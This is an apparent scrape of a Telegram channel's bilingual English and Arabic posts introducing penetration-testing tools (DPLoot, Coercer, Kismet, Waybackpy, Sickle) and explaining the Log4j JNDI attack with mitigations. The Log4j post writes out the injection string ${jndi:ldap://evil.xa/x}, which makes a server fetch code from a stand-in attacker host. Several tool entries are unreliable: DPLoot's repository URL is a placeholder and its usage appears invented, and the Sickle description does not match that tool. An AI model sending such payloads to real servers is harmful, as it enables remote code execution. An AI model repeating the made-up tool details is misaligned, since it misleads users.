uk
Feedback
xtawb

xtawb

Відкрити в Telegram

🚩 Channel was restricted by Telegram

Показати більше
Немає даних
Підписники
-324 години
-197 днів
-2430 днів
Архів дописів
photo content

- DPLoot Tool  is an open-source tool used for extracting sensitive data from domain controllers in Active Directory networks. This tool can extract data such as passwords, Kerberos tickets, and other important information that can be used for network analysis or penetration testing. ˣᵗᵃʷᵇ$$ Features: 1. Sensitive Data Extraction: The tool can extract passwords and other sensitive data. 2. Compatibility: Works with various operating systems that support Python. 3. Use in Penetration Testing: The tool is used for network security testing. ˣᵗᵃʷᵇ$$ Usage Instructions: 1. Download the Tool:    You can download the tool from GitHub using the following command:    
   git clone https://github.com/your-repository/DPLoot.git
   
2. Install Requirements:    After downloading the tool, install the requirements using pip:    
   cd DPLoot
   pip install -r requirements.txt
   
3. Run the Tool:    You can run the tool using the command:    
   python dploot.py -d domain -u username -p password
   
   You can customize the options according to your needs. ˣᵗᵃʷᵇ$$ Usage in Termux: Unfortunately, DPLoot cannot be used directly in Termux due to some technical limitations. The tool relies on certain libraries and services that may not be available or fully supported in the Termux environment. ---//---//--- اداه dploot هي أداة مفتوحة المصدر تُستخدم لاستخراج البيانات الحساسة من وحدات تحكم المجال في شبكات Active Directory. يمكن لهذه الأداة استخراج بيانات مثل كلمات المرور، تذاكر Kerberos، وغيرها من المعلومات الهامة التي يمكن استخدامها لتحليل الشبكة أو إجراء اختبارات الاختراق. $$ مميزات الأداة: 1. استخراج بيانات حساسة: يمكن للأداة استخراج كلمات المرور والبيانات الحساسة الأخرى. 2. التوافق: تعمل مع مختلف أنظمة التشغيل التي تدعم Python. 3. الاستخدام في اختبارات الاختراق: تُستخدم الأداة لاختبار أمان الشبكات. $$ طريقة الاستخدام: 1. تحميل الأداة:    يمكن تحميل الأداة من GitHub باستخدام الأمر التالي:    
   git clone https://github.com/your-repository/DPLoot.git
   
2. تنصيب المتطلبات:    بعد تحميل الأداة، قم بتثبيت المتطلبات باستخدام pip:    
   cd DPLoot
   pip install -r requirements.txt
   
3. تشغيل الأداة:    يمكنك تشغيل الأداة باستخدام الأمر:    
   python dploot.py -d domain -u username -p password
   
   يمكنك تخصيص الخيارات وفقاً لاحتياجاتك. $$ الاستخدام في Termux: للأسف، لا يمكن استخدام DPLoot مباشرة في Termux بسبب بعض القيود الفنية. الأداة تعتمد على بعض المكتبات والخدمات التي قد لا تكون متاحة أو مدعومة بالكامل في بيئة Termux.  

photo content

- Coercer Tool Introduction: Coercer is a specialized security testing tool used to test unauthorized access to DCE/RPC APIs on Windows servers. This tool is incredibly powerful for uncovering security vulnerabilities, especially in large networks. Uses: Coercer is used to test unauthorized access to various sensitive interfaces on Windows servers. It helps identify security vulnerabilities related to DCE/RPC-dependent services, allowing security testers to identify and close potential vulnerabilities. How to Install and Use Coercer on Kali Linux: You can download the Coercer tool from GitHub and install it using the following commands in the terminal:
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
Once installed, you can run the tool using the following command:
python3 coercer.py -h
This will give you a full list of available options and functionalities. Can Coercer Be Used on Termux? Theoretically, Coercer can be run on Termux, but you may face some limitations due to the unavailability of certain libraries or Android system restrictions. Nonetheless, you can try installing it using the following commands:
pkg update && pkg upgrade
pkg install python git
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
---//---//---//--- - أداة Coercer المقدمة: Coercer هي أداة متخصصة في اختبارات الأمان تستخدم لاختبار الوصول غير المصرح به إلى واجهات برمجة تطبيقات DCE/RPC على خوادم ويندوز. تعتبر هذه الأداة قوية للغاية للكشف عن الثغرات الأمنية، خاصة في الشبكات الكبيرة. الاستخدامات: تُستخدم Coercer لاختبار الوصول غير المصرح به إلى مختلف الواجهات الحساسة على خوادم ويندوز. تساعد في الكشف عن الثغرات الأمنية المتعلقة بالخدمات التي تعتمد على DCE/RPC، مما يسمح لمختبري الأمان بتحديد وإغلاق نقاط الضعف المحتملة. طريقة تحميل الأداة واستخدامها على كالي لينكس: يمكن تحميل الأداة Coercer من خلال GitHub وتنصيبها باستخدام الأوامر التالية في الترمينال:
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
بعد تنصيب الأداة، يمكن تشغيلها باستخدام الأمر التالي:
python3 coercer.py -h
للحصول على قائمة كاملة بالخيارات والوظائف المتاحة. هل يمكن استخدام Coercer على تطبيق Termux؟ نظريًا، يمكن تشغيل Coercer على Termux، ولكن قد تواجه بعض القيود بسبب عدم توافر بعض المكتبات أو القيود على نظام الأندرويد. على الرغم من ذلك، يمكنك محاولة تثبيتها باستخدام الأوامر التالية:
pkg update && pkg upgrade
pkg install python git
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt

photo content

photo content

photo content

- استخدام جدار حماية التطبيقات (WAF): لمنع الطلبات المشبوهة من الوصول إلى الخادم. - تعطيل JNDI في Log4j: لتجنب تفسير هذه الأوامر الضارة. - تحديث Log4j: تأكد من أن Log4j محدث لآخر إصدار يحتوي على إصلاحات لهذه الثغرة. - تعطيل تحميل الأكواد من مصادر خارجية: لمنع أي كود غير موثوق من التنفيذ على الخادم. هل فهمتم جميعًا؟

Log4j JNDI Attack: 1. Step 1 - The Attacker's Request: - Attacker: This is the person trying to break into the system. - What do they do? They send a request to the server (which could be a website or an application) using the HTTP protocol. - What's in the request? It contains a string that looks harmless but includes a special code called "JNDI" that can reach out to external resources. For example, ${jndi:ldap://evil.xa/x} tells the server to connect to a specific address on the internet. 2. Step 2 - The Vulnerable Log4j Server: - The Server: This is the system that receives the requests. - What happens here? The server uses Log4j to log data. Log4j is a tool for recording events, like user requests. - The problem: If the server isn't updated or secured properly, Log4j will interpret the incoming string, such as ${jndi:ldap://evil.xa/x}, as a command to execute. 3. Step 3 - Connecting to the Malicious Server: - What happens now? After interpreting the string, Log4j reaches out to the server specified in the string, in this case, ldap://evil.xa/x. - This malicious server could be on the internet and may contain harmful code. 4. Step 4 - Malicious Server Responds with Malicious Data: - What does the malicious server do? It sends back a response containing harmful code. - Why is this bad? The code sent back could include commands that allow the attacker to take control of the system. 5. Step 5 - Executing the Malicious Code: - What happens here? If the target server allows running code from external sources, it will download and execute the malicious code. - What's the result? The attacker might gain access to the system, allowing them to steal data or perform harmful actions. How can we protect ourselves from this attack? - Use a Web Application Firewall (WAF): To block suspicious requests from reaching the server. - Disable JNDI in Log4j: To prevent interpreting these harmful commands. - Update Log4j: Ensure that Log4j is updated to the latest version that includes fixes for this vulnerability. - Disable downloading code from remote sources: To prevent any untrusted code from executing on the server. Did everyone understand? ---//---//---//---//--- هجوم Log4j JNDI: 1. المرحلة الأولى - الطلب المهاجم: - المهاجم: هو الشخص الذي يحاول اختراق النظام. - ماذا يفعل؟ يرسل طلب إلى الخادم (الذي يمكن أن يكون موقع ويب أو تطبيق) باستخدام بروتوكول HTTP. - ما الذي يحتويه الطلب؟ يحتوي على نص يبدو غير ضار ولكنه يحتوي على رمز خاص يسمى "JNDI" يمكنه الاتصال بمصادر خارجية. النص مثل ${jndi:ldap://evil.xa/x} هو طريقة لإخبار الخادم بأن يتصل بعنوان محدد على الإنترنت. 2. المرحلة الثانية - خادم Log4j الضعيف: - الخادم: هو النظام الذي يستقبل الطلبات. - ماذا يحدث هنا؟ يستخدم الخادم Log4j لتسجيل البيانات. Log4j هو أداة لتسجيل الأحداث، مثل تسجيل طلبات المستخدمين. - المشكلة: إذا لم يكن الخادم محدثًا أو مؤمنًا بشكل صحيح، فإن Log4j سيفسر النصوص الواردة، مثل ${jndi:ldap://evil.xa/x}، كأمر لتنفيذ. 3. المرحلة الثالثة - الاتصال بالخادم الخبيث: - ماذا يحدث الآن؟ بعد تفسير النص، يقوم Log4j بالاتصال بالخادم المحدد في النص، في هذا المثال ldap://evil.xa/x. - هذا الخادم الخبيث قد يكون موجودًا على الإنترنت ويحتوي على كود خبيث. 4. المرحلة الرابعة - الخادم الخبيث يرسل البيانات الخبيثة: - ماذا يفعل الخادم الخبيث؟ يرسل استجابة تحتوي على كود برمجي ضار. - كيف يكون هذا ضارًا؟ الكود المرسل قد يحتوي على أوامر برمجية تتيح للمهاجم السيطرة على النظام. 5. المرحلة الخامسة - تنفيذ الكود الخبيث: - ما الذي يحدث هنا؟ إذا كان الخادم المستهدف يسمح بتنفيذ الكود الذي يأتي من مصادر خارجية، فإنه سيقوم بتحميل الكود وتنفيذه. - ما هي النتيجة؟ المهاجم قد يحصل على الوصول إلى النظام، مما يمكنه من سرقة البيانات أو تنفيذ عمليات ضارة. كيف نحمي أنفسنا من هذا الهجوم؟

photo content

photo content

- NetStumbler "A Powerful Tool for Wireless Network Detection* NetStumbler is a popular tool used for detecting and analyzing wireless networks (Wi-Fi). It helps in locating wireless hotspots, identifying the channels being used, checking signal strength, and determining the type of encryption utilized. ˣᵗᵃʷᵇ$$ Uses of NetStumbler: 1. Network Detection: NetStumbler can detect all available wireless networks in a specific area. 2. Signal Strength Analysis: It helps in measuring the signal strength of each network, which is useful for finding the optimal spot for usage. 3. Security Testing: You can use it to ensure that your wireless network is securely configured by checking the type of encryption used. 4. Identifying Dead Spots: The tool can help identify areas where network signals do not reach. ˣᵗᵃʷᵇ$$ How to Download and Use NetStumbler: Unfortunately, NetStumbler is not available directly for Kali Linux or other Linux systems as it is an older tool that has been discontinued. However, you can use alternatives like Kismet, which offers similar features and can be easily installed on Kali Linux. To Install Kismet on Kali Linux:
sudo apt update
sudo apt install kismet
To Run Kismet:
sudo kismet
ˣᵗᵃʷᵇ$$ Using NetStumbler on Termux: NetStumbler is not available for Android or the Termux app. However, you can use alternatives like Kismet or Wireshark on Termux by utilizing the Android GUI. To Install Kismet on Termux:
pkg update
pkg install kismet
After installation, you can run Kismet on Termux similarly to how you would on Kali Linux. ---//---//---//---//---//--- - اداه NetStumbler "أداة قوية لاكتشاف الشبكات اللاسلكية" NetStumbler هي أداة شائعة تستخدم للكشف عن الشبكات اللاسلكية (Wi-Fi) وتحليلها. تساعد هذه الأداة في العثور على النقاط الساخنة للشبكات اللاسلكية، وتحديد القنوات المستخدمة، وفحص قوة الإشارة، والتعرف على نوع التشفير المستخدم. $$ استخدامات NetStumbler: 1. الكشف عن الشبكات: يمكن استخدام NetStumbler للكشف عن جميع الشبكات اللاسلكية المتاحة في منطقة معينة. 2. تحليل قوة الإشارة: تساعد في قياس قوة الإشارة لكل شبكة، مما يساعد في تحديد أفضل موقع للاستخدام. 3. اختبار الأمان: يمكن استخدامها للتأكد من أن الشبكة اللاسلكية الخاصة بك مؤمنة بشكل جيد من خلال فحص نوع التشفير المستخدم. 4. إيجاد النقاط العمياء: يمكن استخدام الأداة لتحديد المناطق التي لا تصل إليها إشارات الشبكة. $$ كيفية تحميل واستخدام NetStumbler: للأسف، NetStumbler غير متوفر مباشرة لنظام كالي لينكس أو أي أنظمة لينوكس أخرى. هذه الأداة قديمة وقد توقفت دعمها. ومع ذلك، يمكنك استخدام بدائل مثل Kismet، الذي يوفر ميزات مشابهة ويمكن تثبيته بسهولة على كالي لينكس. لتثبيت Kismet على كالي لينكس:
sudo apt update
sudo apt install kismet
لتشغيل Kismet:
sudo kismet
$$ استخدام NetStumbler على تطبيق Termux: NetStumbler ليس متاحًا لنظام التشغيل أندرويد أو تطبيق Termux. ومع ذلك، يمكن استخدام بدائل مثل Kismet أو Wireshark في Termux من خلال استخدام واجهة المستخدم الرسومية (GUI) للاندرويد. لتثبيت Kismet على Termux:
pkg update
pkg install kismet
بعد التثبيت، يمكنك تشغيل Kismet على Termux بنفس الطريقة التي تقوم بها على كالي لينكس.

photo content

- Waybackpy Tool Waybackpy is an open-source Python library that allows users to interact with the "Wayback Machine," a service provided by Archive.org. Waybackpy enables access to archived versions of websites and analysis of saved content. ˣᵗᵃʷᵇ$$ Features and Uses: 1. Access to Historical Versions of Websites: The tool allows retrieval of previous versions of web pages, helping in research and analysis of historical web content. 2. Digital Investigations: It can be used in cybersecurity to gather digital evidence or monitor changes to specific sites. 3. Content Analysis: You can extract and analyze data from archived content. ˣᵗᵃʷᵇ$$ How to Install and Use: ˣᵗᵃʷᵇ$$ On Kali Linux: To install and use Waybackpy, follow these steps: 1. Install the Tool:    You can install Waybackpy using the pip package manager:    
   pip install waybackpy
   
2. Using the Tool:    After installation, you can use Waybackpy in your Python programs. Example:    
   from waybackpy import WaybackMachineSaveAPI

   url = "https://example.com"
   save_api = WaybackMachineSaveAPI(url)
   save_api.save()
   
ˣᵗᵃʷᵇ$$ On Termux App: You can also install and use Waybackpy in the Termux app on mobile devices. 1. Install Python and pip:    First, ensure Python and pip are installed:    
   pkg install python
   pkg install python-pip
   
2. Install Waybackpy:    After installing Python and pip, you can install Waybackpy the same way:    
   pip install waybackpy
   
ˣᵗᵃʷᵇ$$ Can it be used in Termux? Yes, Waybackpy can be used in the Termux app on mobile devices. The steps for installation and use are the same as in Kali Linux, as outlined above. ---//---//---//---//---//--- - اداه waybackpy أداة Waybackpy هي مكتبة مفتوحة المصدر بلغة Python تتيح للمستخدمين التفاعل مع "Wayback Machine"، وهي خدمة تابعة لموقع Archive.org. تقدم Waybackpy إمكانية الوصول إلى الإصدارات المؤرشفة من مواقع الويب وتحليل المحتوى المحفوظ. $$ الميزات والاستخدامات: 1. الوصول إلى إصدارات سابقة من المواقع: تتيح الأداة استرجاع إصدارات سابقة من صفحات الويب، مما يساعد على البحث والتحليل في محتوى الويب التاريخي. 2. استخدامات في التحقيقات الرقمية: يمكن استخدامها في مجال الأمن السيبراني لجمع أدلة رقمية أو مراقبة التغييرات على مواقع معينة. 3. تحليل المحتوى: يمكنك استخراج وتحليل البيانات من المحتوى المؤرشف. $$ كيفية التحميل والاستخدام: $$ في نظام كالي لينكس: لتثبيت واستخدام Waybackpy، اتبع الخطوات التالية: 1. تثبيت الأداة:    يمكنك تثبيت Waybackpy باستخدام مدير الحزم pip:    
   pip install waybackpy
   
2. استخدام الأداة:    بعد التثبيت، يمكنك استخدام Waybackpy في برامج Python الخاصة بك. مثال:    
   from waybackpy import WaybackMachineSaveAPI

   url = "https://example.com"
   save_api = WaybackMachineSaveAPI(url)
   save_api.save()
   
$$ في تطبيق Termux على الهاتف: يمكنك أيضًا تثبيت واستخدام Waybackpy في تطبيق Termux على الهواتف المحمولة. 1. تثبيت Python و pip:    تأكد من تثبيت Python و pip أولاً:    
   pkg install python
   pkg install python-pip
   
2. تثبيت Waybackpy:    بعد تثبيت Python و pip، يمكنك تثبيت Waybackpy بنفس الطريقة:    
   pip install waybackpy
   
$$ هل يمكن استخدامها في تطبيق Termux؟ نعم، يمكن استخدام Waybackpy في تطبيق Termux على الهواتف المحمولة. الخطوات اللازمة لتثبيتها واستخدامها هي نفسها كما في كالي لينكس، كما هو موضح أعلاه.

photo content

photo content

photo content

photo content

- Sickle Tool Sickle is an open-source tool used for testing the security of web applications. This tool was developed to help security professionals identify and mitigate vulnerabilities in web applications. Sickle is considered one of the essential tools in the field of web application penetration testing. ˣᵗᵃʷᵇ$$ Features of Sickle: 1. Vulnerability Detection: The tool helps in identifying security vulnerabilities in web applications such as SQL Injection, XSS, and others. 2. Ease of Use: It features a simple command-line interface that makes it easy to use. 3. Customization: Users can customize scans to meet their specific needs. ˣᵗᵃʷᵇ$$ Installation and Usage: ˣᵗᵃʷᵇ$$ Installing Sickle on Kali Linux: To install Sickle on Kali Linux, you can use the following commands in the terminal:
git clone https://github.com/RhinoSecurityLabs/Sickle.git
cd Sickle
pip install -r requirements.txt
ˣᵗᵃʷᵇ$$ Using Sickle: After installing the tool, you can run it using the following command:
python sickle.py -u <URL>
Replace <URL> with the website address you want to scan. ˣᵗᵃʷᵇ$$ Using Sickle on Termux: It is possible to use Sickle on Termux, but some features may not work correctly due to different environments. To install the tool on Termux, you can use the following commands:
pkg install git
pkg install python
git clone https://github.com/RhinoSecurityLabs/Sickle.git
cd Sickle
pip install -r requirements.txt
After that, you can run the tool using the same commands used on Kali Linux. ---//---//---//---//---//---//--- - أداة Sickle أداة Sickle هي أداة مفتوحة المصدر تُستخدم لاختبار أمان تطبيقات الويب. تم تطوير هذه الأداة لتمكين الأمنيين من تحديد نقاط الضعف في تطبيقات الويب ومعالجتها. وتُعتبر Sickle واحدة من الأدوات الهامة في مجال اختبار اختراق تطبيقات الويب. $$ مميزات أداة Sickle: 1. اكتشاف الثغرات: تساعد الأداة في اكتشاف الثغرات الأمنية في تطبيقات الويب مثل حقن SQL و XSS وغيرها. 2. سهولة الاستخدام: تتميز بواجهة سطر أوامر بسيطة تجعلها سهلة الاستخدام. 3. التخصيص: يمكن للمستخدمين تخصيص الفحوصات لتناسب احتياجاتهم الخاصة. $$ طريقة التحميل والاستخدام: $& تحميل أداة Sickle على كالي لينكس: لتثبيت أداة Sickle على نظام كالي لينكس، يمكنك استخدام الأوامر التالية في الطرفية:
git clone https://github.com/RhinoSecurityLabs/Sickle.git
cd Sickle
pip install -r requirements.txt
$$ استخدام أداة Sickle: بعد تثبيت الأداة، يمكنك تشغيلها باستخدام الأمر التالي:
python sickle.py -u <URL>
حيث يتم استبدال <URL> بعنوان الموقع الذي ترغب في فحصه. $$ استخدام أداة Sickle على Termux: من الممكن استخدام أداة Sickle على Termux، لكن يجب أن تكون على علم بأن بعض المميزات قد لا تعمل بشكل صحيح بسبب اختلاف البيئات. لتثبيت الأداة على Termux، يمكنك استخدام الأوامر التالية:
pkg install git
pkg install python
git clone https://github.com/RhinoSecurityLabs/Sickle.git
cd Sickle
pip install -r requirements.txt
بعد ذلك، يمكنك تشغيل الأداة باستخدام نفس الأوامر المستخدمة على كالي لينكس.

photo content